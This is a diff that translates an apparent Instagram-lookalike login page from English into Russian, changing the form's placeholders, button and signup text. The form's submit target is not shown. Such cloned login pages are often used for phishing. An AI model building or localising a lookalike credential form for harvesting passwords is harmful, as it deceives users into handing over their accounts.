--- a/index.html
+++ b/index.html
@@ -17,19 +17,19 @@
         </div>
         <div class="l-part">
             <form name="login">
-                <input type="text" name="login" placeholder="Username" class="input-1" />
+                <input type="text" name="login" placeholder="Имя пользователя..." class="input-1" />
                 <div class="overlap-text">
-                    <input type="password" name="pass" placeholder="Password" class="input-2" />
+                    <input type="password" name="pass" placeholder="Пароль" class="input-2" />
                     <a href="https://www.instagram.com/accounts/password/reset/">Forgot?</a>
                 </div>
-                <input type="submit" value="Log in" class="btn" />
+                <input type="submit" value="Войти" class="btn" />
             </form>
 
         </div>
     </div>
     <div class="sub-content">
         <div class="s-part">
-            Don't have an account?<a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a>
+            У вас ещё нет аккаунта<a href="https://www.instagram.com/accounts/emailsignup/">Зарегистрироваться</a>
         </div>
     </div>
 </div>
